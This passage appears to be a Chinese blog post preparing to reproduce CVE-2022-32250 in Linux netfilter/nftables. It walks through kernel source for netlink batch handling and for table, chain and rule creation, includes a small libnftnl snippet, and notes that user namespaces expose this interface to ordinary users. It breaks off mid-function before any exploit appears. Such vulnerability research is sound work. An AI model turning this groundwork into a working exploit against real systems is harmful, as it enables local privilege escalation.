CVE-2022-32250复现
196082 慢慢好起来

前言

因为工作目前面对着一个不怎么熟悉的netfilter这一模块,所以直接复现一个以往的CVE来认识认识这个模块。

这里介绍这个模块可能不会很好,所以不熟悉的朋友可以去看 https://www.secrss.com/articles/44817 这篇文章。

nftables介绍

nftables取代了流行的{ip,ip6,arp,eb}tables。该软件提供了一个新的内核数据包分类框架,该框架基于特定于网络的虚拟机 (VM) 和新的nft用户空间命令行工具。nftables重用了现有的netfilter子系统,例如现有的钩子基础设施、连接跟踪系统、NAT、用户空间队列和日志子系统。对于nftables,只需要扩展expression即可,用户自行编写expression,然后让nftables虚拟机执行它。nftables框架的数据结构如下所示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Table{
Chain[
Rule
(expression1,expression2,expression3,...)
| | |--> expression_action
| |--> expression_action
|-->expression_action
Rule
(expression,expression,expression,...)
...
],
Chain[
...
],
...
}

Tablechain的容器,chainrule的容器,ruleexpression的容器,expression响应action。构造成由 table->chain->rule->expression 四级组成的数据结构。

nfnetlink初始化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
static int __net_init nfnetlink_net_init(struct net *net)
{
struct sock *nfnl;
struct netlink_kernel_cfg cfg = {
.groups = NFNLGRP_MAX,
.input = nfnetlink_rcv,
#ifdef CONFIG_MODULES
.bind = nfnetlink_bind,
#endif
};

nfnl = netlink_kernel_create(net, NETLINK_NETFILTER, &cfg);
if (!nfnl)
return -ENOMEM;
net->nfnl_stash = nfnl;
rcu_assign_pointer(net->nfnl, nfnl);
return 0;
}

nfnetlink_net_init函数中定义了netlink_kernel_cfg结构,并传给了netlink_kernel_create进行创建。在后续接收消息的时候就会调用nfnetlink_rcv函数了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static void nfnetlink_rcv(struct sk_buff *skb)
{
struct nlmsghdr *nlh = nlmsg_hdr(skb);

if (skb->len < NLMSG_HDRLEN ||
nlh->nlmsg_len < NLMSG_HDRLEN ||
skb->len < nlh->nlmsg_len)
return;

if (!netlink_net_capable(skb, CAP_NET_ADMIN)) {
netlink_ack(skb, nlh, -EPERM, NULL);
return;
}

if (nlh->nlmsg_type == NFNL_MSG_BATCH_BEGIN)
nfnetlink_rcv_skb_batch(skb, nlh);
else
netlink_rcv_skb(skb, nfnetlink_rcv_msg);
}

其中需要CAP_NET_ADMIN才能访问,如果编译时开启了CONFIG_USER_NS那么普通用户也是可以访问的。

以上就是nfnetlink接收消息的完整调用链了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
static void nfnetlink_rcv_batch(struct sk_buff *skb, struct nlmsghdr *nlh,
u16 subsys_id, u32 genid)
{
struct sk_buff *oskb = skb;
struct net *net = sock_net(skb->sk);
const struct nfnetlink_subsystem *ss;
const struct nfnl_callback *nc;
struct netlink_ext_ack extack;
LIST_HEAD(err_list);
u32 status;
int err;

if (subsys_id >= NFNL_SUBSYS_COUNT)
return netlink_ack(skb, nlh, -EINVAL, NULL);
replay:
status = 0;

skb = netlink_skb_clone(oskb, GFP_KERNEL);
if (!skb)
return netlink_ack(oskb, nlh, -ENOMEM, NULL);

nfnl_lock(subsys_id);
ss = nfnl_dereference_protected(subsys_id);
if (!ss) {
#ifdef CONFIG_MODULES
nfnl_unlock(subsys_id);
request_module("nfnetlink-subsys-%d", subsys_id);
nfnl_lock(subsys_id);
ss = nfnl_dereference_protected(subsys_id);
if (!ss)
#endif
{
nfnl_unlock(subsys_id);
netlink_ack(oskb, nlh, -EOPNOTSUPP, NULL);
return kfree_skb(skb);
}
}

if (!ss->valid_genid || !ss->commit || !ss->abort) {
nfnl_unlock(subsys_id);
netlink_ack(oskb, nlh, -EOPNOTSUPP, NULL);
return kfree_skb(skb);
}

if (!try_module_get(ss->owner)) {
nfnl_unlock(subsys_id);
netlink_ack(oskb, nlh, -EOPNOTSUPP, NULL);
return kfree_skb(skb);
}

if (!ss->valid_genid(net, genid)) {
module_put(ss->owner);
nfnl_unlock(subsys_id);
netlink_ack(oskb, nlh, -ERESTART, NULL);
return kfree_skb(skb);
}

nfnl_unlock(subsys_id);

while (skb->len >= nlmsg_total_size(0)) {
int msglen, type;

if (fatal_signal_pending(current)) {
nfnl_err_reset(&err_list);
err = -EINTR;
status = NFNL_BATCH_FAILURE;
goto done;
}

memset(&extack, 0, sizeof(extack));
nlh = nlmsg_hdr(skb);
err = 0;

if (nlh->nlmsg_len < NLMSG_HDRLEN ||
skb->len < nlh->nlmsg_len ||
nlmsg_len(nlh) < sizeof(struct nfgenmsg)) {
nfnl_err_reset(&err_list);
status |= NFNL_BATCH_FAILURE;
goto done;
}

/* Only requests are handled by the kernel */
if (!(nlh->nlmsg_flags & NLM_F_REQUEST)) {
err = -EINVAL;
goto ack;
}

type = nlh->nlmsg_type;
if (type == NFNL_MSG_BATCH_BEGIN) {
/* Malformed: Batch begin twice */
nfnl_err_reset(&err_list);
status |= NFNL_BATCH_FAILURE;
goto done;
} else if (type == NFNL_MSG_BATCH_END) {
status |= NFNL_BATCH_DONE;
goto done;
} else if (type < NLMSG_MIN_TYPE) {
err = -EINVAL;
goto ack;
}

/* We only accept a batch with messages for the same
* subsystem.
*/
if (NFNL_SUBSYS_ID(type) != subsys_id) {
err = -EINVAL;
goto ack;
}

nc = nfnetlink_find_client(type, ss);
if (!nc) {
err = -EINVAL;
goto ack;
}

{
int min_len = nlmsg_total_size(sizeof(struct nfgenmsg));
u8 cb_id = NFNL_MSG_TYPE(nlh->nlmsg_type);
struct nlattr *cda[NFNL_MAX_ATTR_COUNT + 1];
struct nlattr *attr = (void *)nlh + min_len;
int attrlen = nlh->nlmsg_len - min_len;

/* Sanity-check NFTA_MAX_ATTR */
if (ss->cb[cb_id].attr_count > NFNL_MAX_ATTR_COUNT) {
err = -ENOMEM;
goto ack;
}

err = nla_parse(cda, ss->cb[cb_id].attr_count, attr,
attrlen, ss->cb[cb_id].policy, NULL);
if (err < 0)
goto ack;

if (nc->call_batch) {
err = nc->call_batch(net, net->nfnl, skb, nlh,
(const struct nlattr **)cda,
&extack);
}

/* The lock was released to autoload some module, we
* have to abort and start from scratch using the
* original skb.
*/
if (err == -EAGAIN) {
status |= NFNL_BATCH_REPLAY;
goto done;
}
}
ack:
if (nlh->nlmsg_flags & NLM_F_ACK || err) {
/* Errors are delivered once the full batch has been
* processed, this avoids that the same error is
* reported several times when replaying the batch.
*/
if (nfnl_err_add(&err_list, nlh, err, &extack) < 0) {
/* We failed to enqueue an error, reset the
* list of errors and send OOM to userspace
* pointing to the batch header.
*/
nfnl_err_reset(&err_list);
netlink_ack(oskb, nlmsg_hdr(oskb), -ENOMEM,
NULL);
status |= NFNL_BATCH_FAILURE;
goto done;
}
/* We don't stop processing the batch on errors, thus,
* userspace gets all the errors that the batch
* triggers.
*/
if (err)
status |= NFNL_BATCH_FAILURE;
}

msglen = NLMSG_ALIGN(nlh->nlmsg_len);
if (msglen > skb->len)
msglen = skb->len;
skb_pull(skb, msglen);
}
done:
if (status & NFNL_BATCH_REPLAY) {
ss->abort(net, oskb);
nfnl_err_reset(&err_list);
kfree_skb(skb);
module_put(ss->owner);
goto replay;
} else if (status == NFNL_BATCH_DONE) {
err = ss->commit(net, oskb);
if (err == -EAGAIN) {
status |= NFNL_BATCH_REPLAY;
goto done;
} else if (err) {
ss->abort(net, oskb);
netlink_ack(oskb, nlmsg_hdr(oskb), err, NULL);
}
} else {
ss->abort(net, oskb);
}
if (ss->cleanup)
ss->cleanup(net);

nfnl_err_deliver(&err_list, oskb);
kfree_skb(skb);
module_put(ss->owner);
}

首先通过

1
ss = nfnl_dereference_protected(subsys_id);

取出subsys_id对应的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#define NFNL_SUBSYS_NONE 		0
#define NFNL_SUBSYS_CTNETLINK 1
#define NFNL_SUBSYS_CTNETLINK_EXP 2
#define NFNL_SUBSYS_QUEUE 3
#define NFNL_SUBSYS_ULOG 4
#define NFNL_SUBSYS_OSF 5
#define NFNL_SUBSYS_IPSET 6
#define NFNL_SUBSYS_ACCT 7
#define NFNL_SUBSYS_CTNETLINK_TIMEOUT 8
#define NFNL_SUBSYS_CTHELPER 9
#define NFNL_SUBSYS_NFTABLES 10
#define NFNL_SUBSYS_NFT_COMPAT 11
#define NFNL_SUBSYS_HOOK 12
#define NFNL_SUBSYS_COUNT 13

这里我们对nftables进行操作那就很明显是0xa

1
2
3
4
5
6
7
8
9
10
static inline const struct nfnl_callback *
nfnetlink_find_client(u16 type, const struct nfnetlink_subsystem *ss)
{
u8 cb_id = NFNL_MSG_TYPE(type);

if (cb_id >= ss->cb_count)
return NULL;

return &ss->cb[cb_id];
}

在获得subsystem之后就会进入上面的函数,拿到对应的客户端

1
2
3
4
5
6
7
8
9
10
11
static const struct nfnetlink_subsystem nf_tables_subsys = {
.name = "nf_tables",
.subsys_id = NFNL_SUBSYS_NFTABLES,
.cb_count = NFT_MSG_MAX,
.cb = nf_tables_cb,
.commit = nf_tables_commit,
.abort = nf_tables_abort,
.cleanup = nf_tables_cleanup,
.valid_genid = nf_tables_valid_genid,
.owner = THIS_MODULE,
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
static const struct nfnl_callback nf_tables_cb[NFT_MSG_MAX] = {
[NFT_MSG_NEWTABLE] = {
.call_batch = nf_tables_newtable,
.attr_count = NFTA_TABLE_MAX,
.policy = nft_table_policy,
},
[NFT_MSG_GETTABLE] = {
.call_rcu = nf_tables_gettable,
.attr_count = NFTA_TABLE_MAX,
.policy = nft_table_policy,
},
[NFT_MSG_DELTABLE] = {
.call_batch = nf_tables_deltable,
.attr_count = NFTA_TABLE_MAX,
.policy = nft_table_policy,
},
[NFT_MSG_NEWCHAIN] = {
.call_batch = nf_tables_newchain,
.attr_count = NFTA_CHAIN_MAX,
.policy = nft_chain_policy,
},
[NFT_MSG_GETCHAIN] = {
.call_rcu = nf_tables_getchain,
.attr_count = NFTA_CHAIN_MAX,
.policy = nft_chain_policy,
},
[NFT_MSG_DELCHAIN] = {
.call_batch = nf_tables_delchain,
.attr_count = NFTA_CHAIN_MAX,
.policy = nft_chain_policy,
},
[NFT_MSG_NEWRULE] = {
.call_batch = nf_tables_newrule,
.attr_count = NFTA_RULE_MAX,
.policy = nft_rule_policy,
},
[NFT_MSG_GETRULE] = {
.call_rcu = nf_tables_getrule,
.attr_count = NFTA_RULE_MAX,
.policy = nft_rule_policy,
},
[NFT_MSG_DELRULE] = {
.call_batch = nf_tables_delrule,
.attr_count = NFTA_RULE_MAX,
.policy = nft_rule_policy,
},
[NFT_MSG_NEWSET] = {
.call_batch = nf_tables_newset,
.attr_count = NFTA_SET_MAX,
.policy = nft_set_policy,
},
[NFT_MSG_GETSET] = {
.call_rcu = nf_tables_getset,
.attr_count = NFTA_SET_MAX,
.policy = nft_set_policy,
},
[NFT_MSG_DELSET] = {
.call_batch = nf_tables_delset,
.attr_count = NFTA_SET_MAX,
.policy = nft_set_policy,
},
[NFT_MSG_NEWSETELEM] = {
.call_batch = nf_tables_newsetelem,
.attr_count = NFTA_SET_ELEM_LIST_MAX,
.policy = nft_set_elem_list_policy,
},
[NFT_MSG_GETSETELEM] = {
.call_rcu = nf_tables_getsetelem,
.attr_count = NFTA_SET_ELEM_LIST_MAX,
.policy = nft_set_elem_list_policy,
},
[NFT_MSG_DELSETELEM] = {
.call_batch = nf_tables_delsetelem,
.attr_count = NFTA_SET_ELEM_LIST_MAX,
.policy = nft_set_elem_list_policy,
},
[NFT_MSG_GETGEN] = {
.call_rcu = nf_tables_getgen,
},
[NFT_MSG_NEWOBJ] = {
.call_batch = nf_tables_newobj,
.attr_count = NFTA_OBJ_MAX,
.policy = nft_obj_policy,
},
[NFT_MSG_GETOBJ] = {
.call_rcu = nf_tables_getobj,
.attr_count = NFTA_OBJ_MAX,
.policy = nft_obj_policy,
},
[NFT_MSG_DELOBJ] = {
.call_batch = nf_tables_delobj,
.attr_count = NFTA_OBJ_MAX,
.policy = nft_obj_policy,
},
[NFT_MSG_GETOBJ_RESET] = {
.call_rcu = nf_tables_getobj,
.attr_count = NFTA_OBJ_MAX,
.policy = nft_obj_policy,
},
[NFT_MSG_NEWFLOWTABLE] = {
.call_batch = nf_tables_newflowtable,
.attr_count = NFTA_FLOWTABLE_MAX,
.policy = nft_flowtable_policy,
},
[NFT_MSG_GETFLOWTABLE] = {
.call_rcu = nf_tables_getflowtable,
.attr_count = NFTA_FLOWTABLE_MAX,
.policy = nft_flowtable_policy,
},
[NFT_MSG_DELFLOWTABLE] = {
.call_batch = nf_tables_delflowtable,
.attr_count = NFTA_FLOWTABLE_MAX,
.policy = nft_flowtable_policy,
},
};

上述nfnetlink_subsystem结构体中cb成员即客户端,再看对应的nf_tables_cb针对不同的操作定义了多个回调客户端,例如NEWTABLE、NEW_CHAIN之类的操作。

创建table操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
uint8_t family = NFPROTO_IPV4;
struct nftnl_table *table = nftnl_table_alloc();
nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name);
nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0);

struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
int seq = 0;

nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

struct nlmsghdr *nlh;
int table_seq = seq;

nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_table_nlmsg_build_payload(nlh, table);
nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
if (nl == NULL)
errExit(1, "mnl_socket_open");

if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch)) < 0)
err(1, "mnl_socket_send");

上面就是生成一个table的小🌰。

1
2
3
4
5
if (nc->call_batch) {
err = nc->call_batch(net, net->nfnl, skb, nlh,
(const struct nlattr **)cda,
&extack);
}

然后在内核中会调用客户端对应的call_batch成员,这里创建table对应的就是nf_tables_newtable函数了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
static int nf_tables_newtable(struct net *net, struct sock *nlsk,
struct sk_buff *skb, const struct nlmsghdr *nlh,
const struct nlattr * const nla[],
struct netlink_ext_ack *extack)
{
const struct nfgenmsg *nfmsg = nlmsg_data(nlh);
u8 genmask = nft_genmask_next(net);
int family = nfmsg->nfgen_family;
const struct nlattr *attr;
struct nft_table *table;
u32 flags = 0;
struct nft_ctx ctx;
int err;

lockdep_assert_held(&net->nft.commit_mutex);
attr = nla[NFTA_TABLE_NAME];
table = nft_table_lookup(net, attr, family, genmask);
if (IS_ERR(table)) {
if (PTR_ERR(table) != -ENOENT)
return PTR_ERR(table);
} else {
if (nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, attr);
return -EEXIST;
}
if (nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

nft_ctx_init(&ctx, net, skb, nlh, family, table, NULL, nla);
return nf_tables_updtable(&ctx);
}

if (nla[NFTA_TABLE_FLAGS]) {
flags = ntohl(nla_get_be32(nla[NFTA_TABLE_FLAGS]));
if (flags & ~NFT_TABLE_F_DORMANT)
return -EINVAL;
}

err = -ENOMEM;
table = kzalloc(sizeof(*table), GFP_KERNEL);
if (table == NULL)
goto err_kzalloc;

table->name = nla_strdup(attr, GFP_KERNEL);
if (table->name == NULL)
goto err_strdup;

err = rhltable_init(&table->chains_ht, &nft_chain_ht_params);
if (err)
goto err_chain_ht;

INIT_LIST_HEAD(&table->chains);
INIT_LIST_HEAD(&table->sets);
INIT_LIST_HEAD(&table->objects);
INIT_LIST_HEAD(&table->flowtables);
table->family = family;
table->flags = flags;
table->handle = ++table_handle;

nft_ctx_init(&ctx, net, skb, nlh, family, table, NULL, nla);
err = nft_trans_table_add(&ctx, NFT_MSG_NEWTABLE);
if (err < 0)
goto err_trans;

list_add_tail_rcu(&table->list, &net->nft.tables);
return 0;
err_trans:
rhltable_destroy(&table->chains_ht);
err_chain_ht:
kfree(table->name);
err_strdup:
kfree(table);
err_kzalloc:
return err;
}

首先使用attr = nla[NFTA_TABLE_NAME];查找是否存在table,如果存在则调用nf_tables_updtable(&ctx);进行更新,如果不存在则使用kzalloc创建,然后最后将其放到上下文中,并且加入到&net->nft.tables中。

创建chain操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
static int nf_tables_newchain(struct net *net, struct sock *nlsk,
struct sk_buff *skb, const struct nlmsghdr *nlh,
const struct nlattr * const nla[],
struct netlink_ext_ack *extack)
{
const struct nfgenmsg *nfmsg = nlmsg_data(nlh);
u8 genmask = nft_genmask_next(net);
int family = nfmsg->nfgen_family;
const struct nlattr *attr;
struct nft_table *table;
struct nft_chain *chain;
u8 policy = NF_ACCEPT;
struct nft_ctx ctx;
u64 handle = 0;

lockdep_assert_held(&net->nft.commit_mutex);

table = nft_table_lookup(net, nla[NFTA_CHAIN_TABLE], family, genmask);
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_TABLE]);
return PTR_ERR(table);
}

chain = NULL;
attr = nla[NFTA_CHAIN_NAME];

if (nla[NFTA_CHAIN_HANDLE]) {
handle = be64_to_cpu(nla_get_be64(nla[NFTA_CHAIN_HANDLE]));
chain = nft_chain_lookup_byhandle(table, handle, genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_HANDLE]);
return PTR_ERR(chain);
}
attr = nla[NFTA_CHAIN_HANDLE];
} else {
chain = nft_chain_lookup(net, table, attr, genmask);
if (IS_ERR(chain)) {
if (PTR_ERR(chain) != -ENOENT) {
NL_SET_BAD_ATTR(extack, attr);
return PTR_ERR(chain);
}
chain = NULL;
}
}

if (nla[NFTA_CHAIN_POLICY]) {
if (chain != NULL &&
!nft_is_base_chain(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_POLICY]);
return -EOPNOTSUPP;
}

if (chain == NULL &&
nla[NFTA_CHAIN_HOOK] == NULL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_POLICY]);
return -EOPNOTSUPP;
}

policy = ntohl(nla_get_be32(nla[NFTA_CHAIN_POLICY]));
switch (policy) {
case NF_DROP:
case NF_ACCEPT:
break;
default:
return -EINVAL;
}
}

nft_ctx_init(&ctx, net, skb, nlh, family, table, chain, nla);

if (chain != NULL) {
if (nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, attr);
return -EEXIST;
}
if (nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

return nf_tables_updchain(&ctx, genmask, policy);
}

return nf_tables_addchain(&ctx, family, genmask, policy);
}

首先通过table = nft_table_lookup(net, nla[NFTA_CHAIN_TABLE], family, genmask);获取对应的table,如果是没有则直接退出。然后上面存在两种方式寻找chain,如果找到了调用nf_tables_updchain(&ctx, genmask, policy);进行更新即可,如果没有则使用nf_tables_addchain(&ctx, family, genmask, policy);添加。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
u8 policy)
{
const struct nlattr * const *nla = ctx->nla;
struct nft_table *table = ctx->table;
struct nft_base_chain *basechain;
struct nft_stats __percpu *stats;
struct net *net = ctx->net;
struct nft_chain *chain;
struct nft_rule **rules;
int err;

if (table->use == UINT_MAX)
return -EOVERFLOW;

if (nla[NFTA_CHAIN_HOOK]) {
struct nft_chain_hook hook;
struct nf_hook_ops *ops;

err = nft_chain_parse_hook(net, nla, &hook, family, true);
if (err < 0)
return err;

basechain = kzalloc(sizeof(*basechain), GFP_KERNEL);
if (basechain == NULL) {
nft_chain_release_hook(&hook);
return -ENOMEM;
}

if (hook.dev != NULL)
strncpy(basechain->dev_name, hook.dev->name, IFNAMSIZ);

if (nla[NFTA_CHAIN_COUNTERS]) {
stats = nft_stats_alloc(nla[NFTA_CHAIN_COUNTERS]);
if (IS_ERR(stats)) {
nft_chain_release_hook(&hook);
kfree(basechain);
return PTR_ERR(stats);
}
rcu_assign_pointer(basechain->stats, stats);
static_branch_inc(&nft_counters_enabled);
}

basechain->type = hook.type;
chain = &basechain->chain;

ops = &basechain->ops;
ops->pf = family;
ops->hooknum = hook.num;
ops->priority = hook.priority;
ops->priv = chain;
ops->hook = hook.type->hooks[ops->hooknum];
ops->dev = hook.dev;

chain->flags |= NFT_BASE_CHAIN;
basechain->policy = policy;
} else {
chain = kzalloc(sizeof(*chain), GFP_KERNEL);
if (chain == NULL)
return -ENOMEM;
}
ctx->chain = chain;

INIT_LIST_HEAD(&chain->rules);
chain->handle = nf_tables_alloc_handle(table);
chain->table = table;
chain->name = nla_strdup(nla[NFTA_CHAIN_NAME], GFP_KERNEL);
if (!chain->name) {
err = -ENOMEM;
goto err1;
}

rules = nf_tables_chain_alloc_rules(chain, 0);
if (!rules) {
err = -ENOMEM;
goto err1;
}

*rules = NULL;
rcu_assign_pointer(chain->rules_gen_0, rules);
rcu_assign_pointer(chain->rules_gen_1, rules);

err = nf_tables_register_hook(net, table, chain);
if (err < 0)
goto err1;

err = rhltable_insert_key(&table->chains_ht, chain->name,
&chain->rhlhead, nft_chain_ht_params);
if (err)
goto err2;

err = nft_trans_chain_add(ctx, NFT_MSG_NEWCHAIN);
if (err < 0) {
rhltable_remove(&table->chains_ht, &chain->rhlhead,
nft_chain_ht_params);
goto err2;
}

table->use++;
list_add_tail_rcu(&chain->list, &table->chains);

return 0;
err2:
nf_tables_unregister_hook(net, table, chain);
err1:
nf_tables_chain_destroy(ctx);

return err;
}

首先使用basechain = kzalloc(sizeof(*basechain), GFP_KERNEL);创建basechain

1
2
3
4
5
6
7
8
9
struct nft_base_chain {
struct nf_hook_ops ops;
const struct nft_chain_type *type;
u8 policy;
u8 flags;
struct nft_stats __percpu *stats;
struct nft_chain chain;
char dev_name[IFNAMSIZ];
};

随后将其中的成员地址给到chain,后续就是一系列的初始化环节

创建rule操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
static int nf_tables_newrule(struct net *net, struct sock *nlsk,
struct sk_buff *skb, const struct nlmsghdr *nlh,
const struct nlattr * const nla[],
struct netlink_ext_ack *extack)
{
const struct nfgenmsg *nfmsg = nlmsg_data(nlh);
u8 genmask = nft_genmask_next(net);
struct nft_expr_info *info = NULL;
int family = nfmsg->nfgen_family;
struct nft_table *table;
struct nft_chain *chain;
struct nft_rule *rule, *old_rule = NULL;
struct nft_userdata *udata;
struct nft_trans *trans = NULL;
struct nft_expr *expr;
struct nft_ctx ctx;
struct nlattr *tmp;
unsigned int size, i, n, ulen = 0, usize = 0;
int err, rem;
u64 handle, pos_handle;

lockdep_assert_held(&net->nft.commit_mutex);

table = nft_table_lookup(net, nla[NFTA_RULE_TABLE], family, genmask);
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_TABLE]);
return PTR_ERR(table);
}

chain = nft_chain_lookup(net, table, nla[NFTA_RULE_CHAIN], genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN]);
return PTR_ERR(chain);
}

if (nla[NFTA_RULE_HANDLE]) {
handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_HANDLE]));
rule = __nft_rule_lookup(chain, handle);
if (IS_ERR(rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
return PTR_ERR(rule);
}

if (nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
return -EEXIST;
}
if (nlh->nlmsg_flags & NLM_F_REPLACE)
old_rule = rule;
else
return -EOPNOTSUPP;
} else {
if (!(nlh->nlmsg_flags & NLM_F_CREATE) ||
nlh->nlmsg_flags & NLM_F_REPLACE)
return -EINVAL;
handle = nf_tables_alloc_handle(table);

if (chain->use == UINT_MAX)
return -EOVERFLOW;

if (nla[NFTA_RULE_POSITION]) {
pos_handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_POSITION]));
old_rule = __nft_rule_lookup(chain, pos_handle);
if (IS_ERR(old_rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_POSITION]);
return PTR_ERR(old_rule);
}
} else if (nla[NFTA_RULE_POSITION_ID]) {
old_rule = nft_rule_lookup_byid(net, nla[NFTA_RULE_POSITION_ID]);
if (IS_ERR(old_rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_POSITION_ID]);
return PTR_ERR(old_rule);
}
}
}

nft_ctx_init(&ctx, net, skb, nlh, family, table, chain, nla);

n = 0;
size = 0;
if (nla[NFTA_RULE_EXPRESSIONS]) {
info = kvmalloc_array(NFT_RULE_MAXEXPRS,
sizeof(struct nft_expr_info),
GFP_KERNEL);
if (!info)
return -ENOMEM;

nla_for_each_nested(tmp, nla[NFTA_RULE_EXPRESSIONS], rem) {
err = -EINVAL;
if (nla_type(tmp) != NFTA_LIST_ELEM)
goto err1;
if (n == NFT_RULE_MAXEXPRS)
goto err1;
err = nf_tables_expr_parse(&ctx, tmp, &info[n]);
if (err < 0)
goto err1;
size += info[n].ops->size;
n++;
}
}
/* Check for overflow of dlen field */
err = -EFBIG;
if (size >= 1 << 12)
goto err1;

if (nla[NFTA_RULE_USERDATA]) {
ulen = nla_len(nla[NFTA_RULE_USERDATA]);
if (ulen > 0)
usize = sizeof(struct nft_userdata) + ulen;
}

err = -ENOMEM;
rule = kzalloc(sizeof(*rule) + size + usize, GFP_KERNEL);
if (rule == NULL)
goto err1;

nft_activate_next(net, rule);

rule->handle = handle;
rule->dlen = size;
rule->udata = ulen ? 1 : 0;

if (ulen) {
udata = nft_userdata(rule);
udata->len = ulen - 1;
nla_memcpy(udata->data, nla[NFTA_RULE_USERDATA], ulen);
}

expr = nft_expr_first(rule);
for (i = 0; i < n; i++) {
err = nf_tables_newexpr(&ctx, &info[i], expr);
if (err < 0)
goto err2;

if (info[i].ops->validate)
nft_validate_state_update(net, NFT_VALIDATE_NEED);

info[i].ops = NULL;
expr = nft_expr_next(expr);
}

if (nlh->nlmsg_flags & NLM_F_REPLACE) {
trans = nft_trans_rule_add(&ctx, NFT_MSG_NEWRULE, rule);
if (trans == NULL) {
err = -ENOMEM;
goto err2;
}
err = nft_delrule(&ctx, old_rule);
if (err < 0) {
nft_trans_destroy(trans);
goto err2;
}

list_add_tail_rcu(&rule->list, &old_rule->list);
} else {
if (nft_trans_rule_add(&ctx, NFT_MSG_NEWRULE, rule) == NULL) {
err = -ENOMEM;
goto err2;
}

if (nlh->nlmsg_flags & NLM_F_APPEND) {
if (old_rule)
list_add_rcu(&rule->list, &old_rule->list);
else
list_add_tail_rcu(&rule->list, &chain->rules);
} else {
if (old_rule)
